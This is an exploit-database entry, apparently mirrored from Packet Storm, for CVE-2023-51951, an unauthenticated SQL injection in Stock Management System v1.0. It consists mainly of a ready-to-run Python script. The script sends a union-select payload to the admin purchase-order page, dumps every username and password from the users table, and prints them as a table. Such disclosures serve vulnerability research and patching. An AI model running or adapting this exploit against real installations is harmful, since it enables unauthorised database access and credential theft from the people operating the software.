Share
## https://sploitus.com/exploit?id=PACKETSTORM:178039
# Exploit Title: Stock Management System v1.0 - Unauthenticated SQL Injection  
# Date: February 6, 2024  
# Exploit Author: Josué Mier (aka blu3ming) Security Researcher & Penetration Tester @wizlynx group  
# Vendor Homepage: https://www.sourcecodester.com/php/15023/stock-management-system-phpoop-source-code.html  
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/sms.zip  
# Tested on: Linux and Windows, XAMPP  
# CVE-2023-51951  
# Vendor: oretnom23  
# Version: v1.0  
# Exploit Description:  
# The web application Stock Management System is affected by an unauthenticated SQL Injection affecting Version 1.0, allowing remote attackers to dump the SQL database using an Error-Based Injection attack.  
  
import requests  
from bs4 import BeautifulSoup  
import argparse  
  
def print_header():  
print("\033[1m\nStock Management System v1.0\033[0m")  
print("\033[1mSQL Injection Exploit\033[0m")  
print("\033[96mby blu3ming\n\033[0m")  
  
def parse_response(target_url):  
try:  
target_response = requests.get(target_url)  
soup = BeautifulSoup(target_response.text, 'html.parser')  
textarea_text = soup.find('textarea', {'name': 'remarks', 'id': 'remarks'}).text  
  
# Split the text using ',' as a delimiter  
users = textarea_text.split(',')  
for user in users:  
# Split username and password using ':' as a delimiter  
username, password = user.split(':')  
print("| {:<20} | {:<40} |".format(username, password))  
except:  
print("No data could be retrieved. Try again.")  
  
def retrieve_data(base_url):  
target_path = '/sms/admin/?page=purchase_order/manage_po&id='  
payload = "'+union+select+1,2,3,4,5,6,7,8,group_concat(username,0x3a,password),10,11,12,13+from+users--+-"  
  
#Dump users table  
target_url = base_url + target_path + payload  
print("+----------------------+------------------------------------------+")  
print("| {:<20} | {:<40} |".format("username", "password"))  
print("+----------------------+------------------------------------------+")  
parse_response(target_url)  
print("+----------------------+------------------------------------------+\n")  
  
if __name__ == "__main__":  
about = 'Unauthenticated SQL Injection Exploit - Stock Management System'  
parser = argparse.ArgumentParser(description=about)  
parser.add_argument('--url', dest='base_url', required=True, help='Stock Management System URL')  
args = parser.parse_args()  
print_header()  
retrieve_data(args.base_url)